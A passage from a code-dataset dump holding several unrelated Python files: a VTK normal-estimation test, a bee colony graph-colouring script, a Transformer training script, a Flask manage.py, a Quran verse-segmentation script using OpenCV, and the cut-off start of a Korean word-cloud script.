function\nsphere = vtkSphere()\nsphere.SetCenter(0,0,0)\nsphere.SetRadius(0.75)\n\n# Extract points along sphere surface\nextract = vtkFitImplicitFunction()\nextract.SetInputConnection(points.GetOutputPort())\nextract.SetImplicitFunction(sphere)\nextract.SetThreshold(0.005)\nextract.Update()\n\n# Now generate normals from resulting points\nnorms = vtkPCANormalEstimation()\nnorms.SetInputConnection(extract.GetOutputPort())\nnorms.SetSampleSize(20)\nnorms.FlipNormalsOn()\nnorms.SetNormalOrientationToGraphTraversal()\n\n# Time execution\ntimer = vtkTimerLog()\ntimer.StartTimer()\nnorms.Update()\ntimer.StopTimer()\ntime = timer.GetElapsedTime()\nprint(\"Points processed: {0}\".format(NPts))\nprint(\" Time to generate normals: {0}\".format(time))\n#print(hBin)\n#print(hBin.GetOutput())\n\nsubMapper = vtkPointGaussianMapper()\nsubMapper.SetInputConnection(norms.GetOutputPort())\nsubMapper.EmissiveOff()\nsubMapper.SetScaleFactor(0.0)\n\nsubActor = vtkActor()\nsubActor.SetMapper(subMapper)\n\n# Draw the normals\nmask = vtkMaskPoints()\nmask.SetInputConnection(norms.GetOutputPort())\nmask.SetRandomModeType(1)\nmask.SetMaximumNumberOfPoints(250)\n\nhhog = vtkHedgeHog()\nhhog.SetInputConnection(mask.GetOutputPort())\nhhog.SetVectorModeToUseNormal()\nhhog.SetScaleFactor(0.25)\n\nhogMapper = vtkPolyDataMapper()\nhogMapper.SetInputConnection(hhog.GetOutputPort())\n\nhogActor = vtkActor()\nhogActor.SetMapper(hogMapper)\n\n# Create an outline\noutline = vtkOutlineFilter()\noutline.SetInputConnection(points.GetOutputPort())\n\noutlineMapper = vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\n\noutlineActor = vtkActor()\noutlineActor.SetMapper(outlineMapper)\n\n# Create the RenderWindow, Renderer and both Actors\n#\nren0 = vtkRenderer()\nrenWin = vtkRenderWindow()\nrenWin.AddRenderer(ren0)\niren = vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# Add the actors to the renderer, set the background and size\n#\nren0.AddActor(subActor)\nren0.AddActor(hogActor)\nren0.AddActor(outlineActor)\nren0.SetBackground(0.1, 0.2, 0.4)\n\nrenWin.SetSize(250,250)\n\ncam = ren0.GetActiveCamera()\ncam.SetFocalPoint(1,1,1)\ncam.SetPosition(0,0,0)\nren0.ResetCamera()\n\niren.Initialize()\n\n# render the image\n#\nrenWin.Render()\n\niren.Start()\n","sub_path":"Filters/Points/Testing/Python/TestPCANormalEstimation2.py","file_name":"TestPCANormalEstimation2.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"47431900","text":"from random import seed\r\nfrom random import random\r\nimport numpy\r\nimport time\r\n\r\ncolors = ['Red', 'Blue', 'Green', 'Yellow', 'Black']\r\n\r\nstates = ['1', '2', '3', '4']\r\n\r\nneighbors = {}\r\nneighbors['1'] = ['2', '3']\r\nneighbors['2'] = ['1', '3', '4']\r\nneighbors['3'] = ['1', '2', '4']\r\nneighbors['4'] = ['2','3']\r\n\r\ncolors_of_states = {}\r\n\r\n#color_and_fitness=numpy.empty((range(states),2))\r\n\r\nfitness_and_state = {}\r\nfitness = {}\r\n\r\n #code sampled from a java implementation of ABC\r\n #control parameters of ABC algorithm\r\nnp = 20 #len(states) # 20 # the number of the colony size (employed bees + onlooker bees\r\n # might need to have this to be changed based on the nodes that\r\n # are given into the problem\r\nfoodNumber = np/2 # the number of food sources, it equals half of\r\n # the colony size\r\nlimit = 100 # if a food source can't be improved by this limit we abandon\r\nmaxCycle = 2500 # the number of cycles the bee can 
make\r\n\r\n#problem specific variables\r\nD = 100 # the number of parameters of the problem to be optimized\r\nlb = -5.12 #lower bound of the parameters\r\nup = 5.12 # upper bound of the parameters\r\n\r\nruntime = 30\r\n\r\n\r\n#fitness ={} #numpy.empty(foodNumber,1) #vector that holds values of fitness associated with food source \"states\"\r\nprob = {} #numpy.empty(foodNumber,1) #vector that holds the probabilities of the food sources to be chosen\r\n\r\nclass beeColony():\r\n    \r\n\r\n    def __init__(self, states):\r\n        self.states = states\r\n        #for state in self.states:\r\n            #self.set(state)\r\n    \r\n    def __str__(self):\r\n        \r\n        for i in range(len(self.states)):\r\n            \r\n            #print(\"I am at \", self.position[i], \" my pbest is \", self.pbest_position[i]) \r\n            colors_of_states[self.states[i]] = self.get_color_for_state(self.states[i])\r\n\r\n        return str(colors_of_states)\r\n        \r\n    def set2(self,state):\r\n        # record the fitness of every state handed in\r\n        for s in state:\r\n            fitness[s] = self.calculateFitness(s)\r\n            #fitness_and_state.append([fitness[s], s])\r\n        \r\n\r\n    def calculateFitness(self,state): # the fitness of a node is its degree,\r\n                                      # i.e. how many neighbours it has\r\n        h = 0\r\n        for neighbor in neighbors.get(state, []):\r\n            h += 1\r\n        #    numpy.append(color_and_fitness, [state, i])  \r\n        return h\r\n    \r\n    def sortSecond(self,val): #code from https://www.geeksforgeeks.org/python-list-sort/\r\n        return val[1]         # used to help sort a list of [value, key] pairs\r\n    \r\n    # def memorizeBestSource(self): # this should hold the best source seen so\r\n                                    # far -- the node with the fewest colours\r\n                                    # left to choose from at this point\r\n        \r\n        #fitness.sort(reverse =True) # s\r\n        #fitness_and_state.sort(self,key =sortSecond, reverse =True) #orders the list from most nodes to least \r\n        \r\n\r\n    def sendEmployedBees(self,state): # generate a random number from 0 to the # of states\r\n\r\n        colors_of_states[state] = colors_of_states.get(state) # keep any colour already assigned\r\n        fitness[state] = 0 # set the fitness to 0 so that if this state is selected\r\n                           # in the future it will already have been assigned a color\r\n\r\n\r\n    def calculateProbilities(self): # find the probability that a chosen state\r\n                                    # is better than the ones seen before it\r\n        maxfit = fitness[states[0]]\r\n        for state in states:\r\n            if (fitness[state] > maxfit):\r\n                maxfit = fitness[state]\r\n\r\n        # for state in states:\r\n        #     prob[state] = (0.9 * (fitness[state] / maxfit)) + 0.1\r\n        # equation taken from a java ABC implementation; the selection\r\n        # probability is derived from fitness\r\n\r\n    def sendOnlookerBees(self,state):\r\n        # colour one state, or every state if a whole list is passed in\r\n        for s in (state if isinstance(state, list) else [state]):\r\n            colors_of_states[s] = self.get_color_for_state(s)\r\n\r\n    #def sendScoutBees(self):\r\n    #    null\r\n    \r\n    def get_color_for_state(self,state):\r\n        for color in colors:\r\n            if self.promising(state, color):\r\n                return color\r\n    \r\n    def promising(self,state, color):\r\n        # a colour is promising only if none of this state's neighbours use it\r\n        for neighbor in neighbors.get(state, []):\r\n            color_of_neighbor = colors_of_states.get(neighbor)\r\n            if color_of_neighbor == color:\r\n                return False\r\n\r\n        return True\r\n\r\n\r\n\r\n\r\ndef main():\r\n    start=time.time()\r\n    # for state in states:\r\n    #     colors_of_states[state] = get_color_for_state(state)\r\n    bees = beeColony(states)\r\n    #graph=bees.set2(bees.states)\r\n    # bees.sendEmployedBees(states)\r\n    #bees.calculateProbilities()\r\n
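    # Worked example (editor's sketch, not from the original author): with the\r\n    # 4-node graph defined above, the greedy promising() check plays out as:\r\n    # '1' -> Red; '2' sees Red on '1' -> Blue; '3' sees Red and Blue -> Green;\r\n    # '4' sees Blue on '2' and Green on '3' -> Red again, so 3 colours suffice.\r\n    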
bees.sendOnlookerBees(states)\r\n bees.__str__()\r\n #bees.memorizeBestSource()\r\n # bees.sendScoutBees()\r\n \r\n stop = time.time()\r\n duration = stop-start\r\n print (colors_of_states)\r\n print(\"\\n\",\"The time to solve the solution is: \"+str(duration))\r\n \r\n\r\n\r\n\r\nmain() \r\n\r\n\r\n\r\n\r\nstates = ['1','2','3','4','5','6','7','8']\r\nneighbors = {}\r\nneighbors['1'] = ['2', '3', '5']\r\nneighbors['2'] = ['1', '6', '5']\r\nneighbors['3'] = ['1', '4', '5','6']\r\nneighbors['4'] = ['3', '6','8']\r\nneighbors['5'] = ['2', '3', '1','7']\r\nneighbors['6'] = ['2', '3', '4','8']\r\nneighbors['7'] = ['5', '8',]\r\nneighbors['8'] = ['7','6','4']\r\n\r\n\r\n\r\n\r\ndef main2():\r\n start=time.time()\r\n # for state in states:\r\n # colors_of_states[state] = get_color_for_state(state)\r\n bees =beeColony(states)\r\n #graph=bees.set2(bees.states)\r\n # bees.sendEmployedBees(states)\r\n #bees.calculateProbilities()\r\n bees.sendOnlookerBees(states)\r\n bees.__str__()\r\n #bees.memorizeBestSource()\r\n # bees.sendScoutBees()\r\n \r\n stop = time.time()\r\n duration = stop-start\r\n print (colors_of_states)\r\n print(\"\\n\",\"The time to solve the solution is: \"+str(duration))\r\n \r\n\r\n\r\n\r\nmain2()\r\n\r\n\r\n\r\n\r\nstates = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20']\r\nneighbors = {}\r\nneighbors['1'] = ['6', '3', '2']\r\nneighbors['2'] = ['1', '4', '10']\r\nneighbors['3'] = ['1', '6', '4','5']\r\nneighbors['4'] = ['3', '2','16','8','5']\r\nneighbors['5'] = ['6','3','4','13','15','7']\r\nneighbors['6'] = ['1','3','5']\r\nneighbors['7'] = ['5', '9','19']\r\nneighbors['8'] = ['4','14','11','9','12']\r\nneighbors['9'] = ['8','12','7','18']\r\nneighbors['10'] = ['2','16']\r\nneighbors['11'] = ['14','8']\r\nneighbors['12'] = ['8','17','9']\r\nneighbors['13'] = ['5','15']\r\nneighbors['14'] = ['16','11','8']\r\nneighbors['15'] = ['13','5','20']\r\nneighbors['16'] = ['10','4','14']\r\nneighbors['17'] = ['12']\r\nneighbors['18'] = ['9','19']\r\nneighbors['19'] = ['20','7','18']\r\nneighbors['20'] = ['15','19']\r\n\r\n\r\n\r\n\r\n\r\ndef main3():\r\n start=time.time()\r\n # for state in states:\r\n # colors_of_states[state] = get_color_for_state(state)\r\n bees =beeColony(states)\r\n #graph=bees.set2(bees.states)\r\n # bees.sendEmployedBees(states)\r\n #bees.calculateProbilities()\r\n bees.sendOnlookerBees(states)\r\n bees.__str__()\r\n #bees.memorizeBestSource()\r\n # bees.sendScoutBees()\r\n \r\n stop = time.time()\r\n duration = stop-start\r\n print (colors_of_states)\r\n print(\"\\n\",\"The time to solve the solution is: \"+str(duration))\r\n \r\n\r\n\r\n\r\nmain3()\r\n\r\n","sub_path":"ABC2.py","file_name":"ABC2.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"416308092","text":"# For data loading.\r\nfrom torchtext import data, datasets\r\nfrom data_process import ParallelDataset, Batch, subsequent_mask, batch_size_fn, read_corpus\r\nimport time\r\nimport torch\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\n\r\nfrom model import make_model\r\nfrom optim import LabelSmoothing, NoamOpt\r\nfrom loss import SimpleLossCompute\r\nimport argparse\r\n\r\n\r\ndef run_epoch(data_iter, model, loss_compute):\r\n \"Standard Training and Logging Function\"\r\n start = time.time()\r\n total_tokens = 0\r\n total_loss = 0\r\n tokens = 0\r\n for i, batch in enumerate(data_iter):\r\n out = model.forward(batch.src, batch.trg,\r\n 
batch.src_mask, batch.trg_mask)\r\n        loss = loss_compute(out, batch.trg_y, batch.ntokens)\r\n        total_loss += loss\r\n        total_tokens += batch.ntokens\r\n        tokens += batch.ntokens\r\n        if i % opt.display_freq == 1:\r\n            elapsed = time.time() - start\r\n            print(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\" %\r\n                  (i, loss / batch.ntokens, tokens / elapsed))\r\n            start = time.time()\r\n            tokens = 0\r\n    return total_loss / total_tokens\r\n\r\n\r\nclass MyIterator(data.Iterator):\r\n    def create_batches(self):\r\n        if self.train:\r\n            def pool(d, random_shuffler):\r\n                for p in data.batch(d, self.batch_size * 100):\r\n                    p_batch = data.batch(\r\n                        sorted(p, key=self.sort_key),\r\n                        self.batch_size, self.batch_size_fn)\r\n                    for b in random_shuffler(list(p_batch)):\r\n                        yield b\r\n\r\n            self.batches = pool(self.data(), self.random_shuffler)\r\n\r\n        else:\r\n            self.batches = []\r\n            for b in data.batch(self.data(), self.batch_size,\r\n                                self.batch_size_fn):\r\n                self.batches.append(sorted(b, key=self.sort_key))\r\n\r\n\r\ndef rebatch(pad_idx, batch):\r\n    \"Fix order in torchtext to match ours\"\r\n    # batch.src and batch.trg are (data, lengths) tuples because the Fields\r\n    # are built with include_lengths=True; we only need the data tensor\r\n    src, trg = batch.src[0], batch.trg[0]\r\n    return Batch(src, trg, pad_idx)\r\n\r\n\r\n# load\r\ndef load_data(path, max_src_len, max_trg_len, BATCH_SIZE, device):\r\n\r\n    # Extra vocabulary symbols; the strings only serve to derive the\r\n    # integer ids 0..3 below, so they must be distinct\r\n    pad_token = \"<pad>\"\r\n    unk_token = \"<unk>\"\r\n    bos_token = \"<bos>\"\r\n    eos_token = \"<eos>\"\r\n\r\n    extra_tokens = [pad_token, unk_token, bos_token, eos_token]\r\n\r\n    PAD = extra_tokens.index(pad_token)\r\n    UNK = extra_tokens.index(unk_token)\r\n    BOS = extra_tokens.index(bos_token)\r\n    EOS = extra_tokens.index(eos_token)\r\n\r\n    SRC = data.Field(sequential=True, use_vocab=False, include_lengths=True, batch_first=True,\r\n                     pad_token=PAD, unk_token=UNK, init_token=BOS, eos_token=EOS, )\r\n    TGT = data.Field(sequential=True, use_vocab=False, include_lengths=True, batch_first=True,\r\n                     pad_token=PAD, unk_token=UNK, init_token=BOS, eos_token=EOS, )\r\n    fields = (SRC, TGT)\r\n\r\n    # path = 'small-train.t7'\r\n    dataset = torch.load(path)\r\n    train_src, train_tgt = dataset['train_src'], dataset['train_tgt']\r\n    dev_src, dev_tgt = dataset['dev_src'], dataset['dev_tgt']\r\n\r\n    def filter_pred(example):\r\n        if len(example.src) <= max_src_len and len(example.trg) <= max_trg_len:\r\n            return True\r\n        return False\r\n\r\n    train = ParallelDataset(train_src, train_tgt, fields=fields, filter_pred=filter_pred)\r\n    val = ParallelDataset(dev_src, dev_tgt, fields=fields, filter_pred=filter_pred)\r\n\r\n    MIN_FREQ = 1\r\n    SRC.build_vocab(train.src, min_freq=MIN_FREQ)\r\n    TGT.build_vocab(train.trg, min_freq=MIN_FREQ)\r\n\r\n    #########################################\r\n    train_iter = MyIterator(train, batch_size=BATCH_SIZE, device=device,\r\n                            repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n                            batch_size_fn=batch_size_fn, train=True)\r\n    valid_iter = MyIterator(val, batch_size=BATCH_SIZE, device=device,\r\n                            repeat=False, sort_key=lambda x: (len(x.src), len(x.trg)),\r\n                            batch_size_fn=batch_size_fn, train=False)\r\n    return SRC, TGT, train_iter, valid_iter\r\n\r\n\r\ndef greedy_decode(model, src, src_mask, max_len, start_symbol):\r\n    memory = model.encode(src, src_mask)\r\n    ys = torch.ones(1, 1).fill_(start_symbol).type_as(src.data)\r\n\r\n    for i in range(max_len - 1):\r\n        out = model.decode(memory, src_mask, Variable(ys), Variable(subsequent_mask(ys.size(1)).type_as(src.data)))\r\n        prob = model.generator(out[:, -1])\r\n        _, next_word = torch.max(prob, dim=1)\r\n        next_word = next_word.data[0]\r\n        ys = torch.cat([ys, torch.ones(1, 
1).type_as(src.data).fill_(next_word)], dim=1)\r\n return ys\r\n\r\n\r\ndef main(opt):\r\n use_cuda = torch.cuda.is_available()\r\n if use_cuda:\r\n print(\"Use GPU...\")\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n # device = torch.device(\"cpu\")\r\n SRC, TGT, train_iter, valid_iter = load_data(opt.data_path, max_src_len=opt.max_src_seq_len, max_trg_len=opt.max_tgt_seq_len, BATCH_SIZE=opt.batch_size, device=device)\r\n pad_idx = TGT.vocab.stoi[1]\r\n model = make_model(len(SRC.vocab), len(TGT.vocab), N=opt.n_layers, d_model=opt.d_model, d_ff=opt.d_ff, h=opt.n_heads, dropout=opt.dropout).to(device)\r\n criterion = LabelSmoothing(size=len(TGT.vocab), padding_idx=pad_idx, smoothing=0.1).to(device)\r\n model_opt = NoamOpt(model.src_embed[0].d_model, 1, opt.n_warp_steps,\r\n torch.optim.Adam(model.parameters(), lr=opt.lr, betas=(0.9, 0.98), eps=1e-9))\r\n for epoch in range(opt.epochs):\r\n print('epoch:', epoch)\r\n model.train()\r\n run_epoch((rebatch(pad_idx, b) for b in train_iter),\r\n model,\r\n SimpleLossCompute(model.generator, criterion, model_opt))\r\n model.eval()\r\n run_epoch((rebatch(pad_idx, b) for b in valid_iter), model,\r\n SimpleLossCompute(model.generator, criterion, opt=None))\r\n\r\n torch.save(model, opt.save_model)\r\n\r\n\r\n# ################################\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='Training Hyperparams')\r\n parser.add_argument('-data_path', default='vatex_len_40-train.t7', help='Path to the preprocessed data')\r\n\r\n # network params\r\n parser.add_argument('-d_model', type=int, default=512)\r\n parser.add_argument('-d_ff', type=int, default=2048)\r\n parser.add_argument('-n_heads', type=int, default=8)\r\n parser.add_argument('-n_layers', type=int, default=6)\r\n parser.add_argument('-dropout', type=float, default=0.1)\r\n\r\n # training params\r\n parser.add_argument('-lr', type=float, default=0.02)\r\n parser.add_argument('-epochs', type=int, default=1)\r\n parser.add_argument('-batch_size', type=int, default=128)\r\n parser.add_argument('-max_src_seq_len', type=int, default=50)\r\n parser.add_argument('-max_tgt_seq_len', type=int, default=50)\r\n # parser.add_argument('-max_grad_norm', type=float, default=None)\r\n parser.add_argument('-n_warp_steps', type=int, default=4000)\r\n parser.add_argument('-display_freq', type=int, default=100)\r\n # parser.add_argument('-log', default=None)\r\n # parser.add_argument('-model_path', type=str, default='None')\r\n parser.add_argument('-save_model', type=str, default='final_model.pkl')\r\n\r\n opt = parser.parse_args()\r\n print(opt)\r\n main(opt)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Transformer/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"654447831","text":"import os\nimport unittest\n\nfrom app.init_app import socketIo, app\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nfrom app import blueprint\nfrom app.main import db\n\n\nif len(app.blueprints) < 1:\n app.register_blueprint(blueprint)\n app.app_context().push()\n app.config['ERROR_404_HELP'] = False\n\nmanager = Manager(app)\n\nmigrate = Migrate(app, db)\n\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef run():\n socketIo.run(app)\n\n\n@manager.command\ndef test():\n tests = unittest.TestLoader().discover('app/test', pattern='test*.py')\n result = 
unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n return 1\n\n\nif __name__ == '__main__':\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181510598","text":"#!/usr/bin/env python2\nimport os\nimport argparse\nimport csv\nimport cv2\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom verses_count import verses_count\nfrom ayat import find_ayat, draw, output_aya_segment\nfrom utils import safe_makedir, load_lines\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_path', type=str, required=True,\n help='''Path to input folder containing PNG images''')\n parser.add_argument('--output_path', type=str, required=True,\n help='''Path to output folder to generate verification images in''')\n parser.add_argument('--separator1_path', type=str, required=True,\n help='''Path to separator image template for pages 1 and 2''')\n parser.add_argument('--separator3_path', type=str, required=True,\n help='''Path to separator image template for pages 3 up to the end''')\n parser.add_argument('--count_method', type=str, choices=list(verses_count.keys()), required=True,\n help='''Counting method to use''')\n parser.add_argument('--pages', type=str, default='1..604',\n help='''Comma seprated page numbers or ranges, default is 1..604''')\n parser.add_argument('--start_sura', type=str, default='1',\n help='''Start sura numbers for each page in the input pages, default = 1''')\n parser.add_argument('--start_aya', type=str, default='1',\n help='''Start aya numbers for each page in the input pages, default = 1''')\n parser.add_argument('--start_sura_aya_tsv', type=str,\n help='''If specified, reads start_sura and start_aya numbers from recitation tsv''')\n parser.add_argument('--matching_threshold', type=float, default=0.42,\n help='''Matching threshold to match aya separators, default = 0.42''')\n return parser.parse_args()\n\n\ndef parse_start_tuples(args):\n if args.start_sura_aya_tsv:\n return read_start_tuples_tsv(args.pages, args.start_sura_aya_tsv)\n else:\n return read_start_tuple_args(args.pages, args.start_sura, args.start_aya)\n\n\ndef read_start_tuples_tsv(pages, tsv):\n # read tsv and return tuples (page, sura, ayah) for lines with lineId == 1\n if not os.path.isfile(tsv):\n raise RuntimeError(\"File: '%s' not found\" % tsv)\n\n # open file in universal new line mode: U\n with open(tsv, 'rU') as csvfile:\n reader = csv.reader(csvfile, delimiter='\\t', quotechar='\"')\n # file format: rewayaId\tpageId\tsuraId\tverseId\tlineId\tdata\n pages_dict = {}\n for row in reader:\n if row[4] == '1' and pages_dict.get(int(row[1])) == None:\n pages_dict[int(row[1])] = (int(row[2]), int(row[3]))\n\n tuples = []\n total_pages = 0\n for page in pages.split(','):\n page_range = page.split('..')\n start_page = int(page_range[0])\n end_page = int(page_range[-1])\n total_pages += end_page - start_page + 1\n tuples.append({\n 'start_page': start_page,\n 'end_page': end_page,\n 'start_sura': pages_dict[start_page][0],\n 'start_aya': pages_dict[start_page][1]\n })\n return total_pages, tuples\n\ndef read_start_tuple_args(pages, start_sura, start_aya):\n tuples = []\n pages = pages.split(',')\n suras = start_sura.split(',')\n ayahs = start_aya.split(',')\n total_pages = 0\n\n if not (len(pages) == len(suras) == len(ayahs)):\n raise ValueError('Lengths of pages, start_sura and 
start_aya arguments must match')\n\n for page, sura, ayah in zip(pages, suras, ayahs):\n page_range = page.split('..')\n start_page = int(page_range[0])\n end_page = int(page_range[-1])\n total_pages += end_page - start_page + 1\n tuples.append({\n 'start_page': start_page,\n 'end_page': end_page,\n 'start_sura': int(sura),\n 'start_aya': int(ayah)\n })\n return total_pages, tuples\n\ndef main_find_ayat(progress_bar, all_pages_lines, count_method, start_page, end_page,\n start_sura, start_aya, separator1_path, separator3_path,\n matching_threshold, input_path, output_path, segments_path):\n # by default, we don't increase the ayah on the top of this loop\n # to handle ayat that span multiple pages - this flag allows us to\n # override this.\n end_of_ayah = False\n sura = start_sura\n ayah = 1\n default_lines_to_skip = 2\n count_ayat = verses_count[count_method]\n\n if start_page == 1: # default behavior for page 1\n # in kofy/makky basmallah is counted as aya 1\n if count_method == 'kofy' or count_method == 'makky':\n lines_to_skip = 1\n else:\n lines_to_skip = 2\n elif start_page == 2: # default behavior for page 2\n lines_to_skip = 2\n elif start_sura == 9 and start_aya < 2: # skip only 1 line (header) for tawba\n lines_to_skip = 1\n elif start_aya < 1: # skip 1 if ayah = 0 (basmalah), skip 2 if ayah = -1 (header)\n lines_to_skip = 1 - start_aya\n else: # don't skip anything, starting from the middle of a sura\n lines_to_skip = 0\n ayah = start_aya\n\n for i in range(start_page, end_page + 1):\n filename = str(i) + '.png'\n lines = all_pages_lines[i]\n\n img_gray = cv2.imread(input_path + filename, -1)\n if i == 1 or i == 2:\n template = cv2.imread(separator1_path, -1)\n else:\n template = cv2.imread(separator3_path, -1)\n\n ayat = find_ayat(img_gray, template, matching_threshold)\n\n tpl_width = template.shape[1]\n\n current_line = 0\n x_pos_in_line = -1\n num_lines = len(lines)\n\n with open(segments_path + str(i).zfill(3) + \".sql\", \"wb\") as segments_file:\n first = True\n for ayah_item in ayat:\n if ((end_of_ayah or not first) and count_ayat[sura - 1] == ayah):\n sura = sura + 1\n ayah = 1\n lines_to_skip = default_lines_to_skip\n if sura == 9:\n lines_to_skip = lines_to_skip - 1\n end_of_ayah = False\n elif (end_of_ayah or not first):\n ayah = ayah + 1\n end_of_ayah = False\n first = False\n y_pos = ayah_item[1]\n\n pos = 0\n for line in range(current_line, num_lines):\n cur_line = lines[line]\n miny = cur_line[0][1]\n maxy = cur_line[1][1]\n cur_line_minx = cur_line[0][0]\n cur_line_maxx = cur_line[1][0]\n if lines_to_skip > 0:\n # it is header if skipping 2 lines (obviously)\n # or skipping 1 line and we are in sura 9 tawba (no basmala)\n # or skipping 1 line and we are in sura 1 fatiha and first line\n # (some counting methods don't have basmalah, in which case they skip only 1 line)\n if lines_to_skip == 2 or lines_to_skip == 1 and (sura == 9 or sura == 1 and line == 0): # header\n vals = (i, line + 1, sura, -1, 1, cur_line_minx, cur_line_maxx, miny, maxy)\n else: # basmala\n vals = (i, line + 1, sura, 0, 1, cur_line_minx, cur_line_maxx, miny, maxy)\n output_aya_segment(vals, img_gray, segments_file)\n lines_to_skip = lines_to_skip - 1\n current_line = current_line + 1\n continue\n pos = pos + 1\n if y_pos <= maxy:\n # we found the line with the ayah\n maxx = cur_line_maxx\n if x_pos_in_line > 0:\n maxx = x_pos_in_line\n minx = ayah_item[0]\n # small value indicating that the separator is the last thing comes in line\n # or page 1 and second line (always basmalah), this is to 
cover basmalah when counted as aya 1\n if minx < tpl_width/2 or i == 1 and line == 1:\n minx = 0\n end_of_sura = False\n if count_ayat[sura - 1] == ayah:\n end_of_sura = True\n\n # last aya in sura segment must extend to the leftmost, the empty space is ugly\n # also last ayah in page 2 must extend to the leftmost\n if end_of_sura or i == 2 and ayah_item == ayat[-1]:\n minx = 0\n\n vals = (i, line + 1, sura, ayah, pos, minx, maxx, miny, maxy)\n output_aya_segment(vals, img_gray, segments_file)\n\n # check if this is header/basmalah, it must occupy the whole line\n if (vals[3] == -1 or vals[3] == 0) and (vals[5] != 0 or vals[6] != cur_line_maxx):\n raise RuntimeError(\n 'Something is wrong: Header or Basmalah are not occuping the whole line')\n\n if end_of_sura or abs(minx - cur_line_minx) < tpl_width/2:\n x_pos_in_line = -1\n current_line = current_line + 1\n if current_line == num_lines:\n # last line, and no more ayahs - set it to increase\n end_of_ayah = True\n else:\n x_pos_in_line = minx\n break\n else:\n # we add this line\n maxx = cur_line_maxx\n if x_pos_in_line > 0:\n maxx = x_pos_in_line\n x_pos_in_line = -1\n current_line = current_line + 1\n vals = (i, line + 1, sura, ayah, pos, cur_line_minx, maxx,\n miny, maxy)\n output_aya_segment(vals, img_gray, segments_file)\n\n # draw aya separators\n draw(img_gray, template, ayat)\n\n # handle cases when the sura ends on a page, and there are no more\n # ayat. this could mean that we need to adjust lines_to_skip (as is\n # the case when the next sura header is at the bottom) or also add\n # some ayat that aren't being displayed at the moment.\n if end_of_sura:\n # end of sura always means x_pos_in_line is -1\n sura = sura + 1\n ayah = 1\n lines_to_skip = default_lines_to_skip\n if sura == 9:\n lines_to_skip = lines_to_skip - 1\n end_of_ayah = False\n while line + 1 < num_lines and lines_to_skip > 0:\n line = line + 1\n if lines_to_skip == 2 or lines_to_skip == 1 and sura == 9: # header\n vals = (i, line + 1, sura, -1, 1, lines[line][0][0], lines[line][1][0], lines[line][0][1], lines[line][1][1])\n else: # basmala\n vals = (i, line + 1, sura, 0, 1, lines[line][0][0], lines[line][1][0], lines[line][0][1], lines[line][1][1])\n output_aya_segment(vals, img_gray, segments_file)\n lines_to_skip = lines_to_skip - 1\n if lines_to_skip == 0 and line + 1 != num_lines:\n ayah = 0\n\n # we have some lines unaccounted for or stopped mid-line\n if x_pos_in_line != -1 or line + 1 != num_lines:\n if x_pos_in_line == -1:\n line = line + 1\n pos = 0\n ayah = ayah + 1\n # we ignore pages 1 and 2 because they always have empty spaces at the end\n if i > 2:\n for l in range(line, num_lines):\n cur_line = lines[l]\n pos = pos + 1\n maxx = cur_line[1][0]\n if x_pos_in_line > 0:\n maxx = x_pos_in_line\n x_pos_in_line = -1\n vals = (i, l + 1, sura, ayah, pos, cur_line[0][0], maxx,\n cur_line[0][1], cur_line[1][1])\n output_aya_segment(vals, img_gray, segments_file)\n\n # done with detecting segments, now write using cv2\n image_name = output_path + str(i).zfill(3) + \".png\"\n cv2.imwrite(image_name, img_gray)\n\n # now paste segmented to original\n original = Image.open(input_path + filename).convert('RGBA')\n segmented = Image.open(image_name).convert('RGBA')\n segmented.paste(original, mask=original)\n segmented.save(image_name, \"PNG\")\n\n # finally increment progress bar\n progress_bar.update(1)\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n total_pages, start_tuples = parse_start_tuples(args)\n\n input_path = args.input_path + '/'\n 
output_path = safe_makedir(args.output_path + '/ayat/')\n segments_path = safe_makedir(args.output_path + '/segments/')\n lines = load_lines(args.output_path)\n\n print(\"Finding aya boundaries using separator templates into \" + output_path + \"...\")\n with tqdm(total=total_pages) as pbar:\n for tuple in start_tuples:\n main_find_ayat(progress_bar=pbar,\n all_pages_lines=lines,\n start_page=tuple['start_page'],\n end_page=tuple['end_page'],\n start_sura=tuple['start_sura'],\n start_aya=tuple['start_aya'],\n count_method=args.count_method,\n separator1_path=args.separator1_path,\n separator3_path=args.separator3_path,\n matching_threshold=args.matching_threshold,\n input_path=input_path,\n output_path=output_path,\n segments_path=segments_path)\n","sub_path":"detect_ayat.py","file_name":"detect_ayat.py","file_ext":"py","file_size_in_byte":12694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"4675312","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 7/21/17\nAuthor: Jihoon Kim\n\"\"\"\n\n\nfrom konlpy.tag import Twitter\nfrom konlpy.utils import pprint\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.rc('font', family=\"NanumBarunGothic\")\nimport seaborn as sns\nimport pandas as pd\nfrom wordcloud import WordCloud, ImageColorGenerator\nfrom collections import Counter\nimport numpy as np\nfrom PIL import Image\ndata = pd.read_csv('./data/c_data/덕수궁.csv')\n\ntext_sample = data.review\n\nlength = data.shape[0]\ntwit = 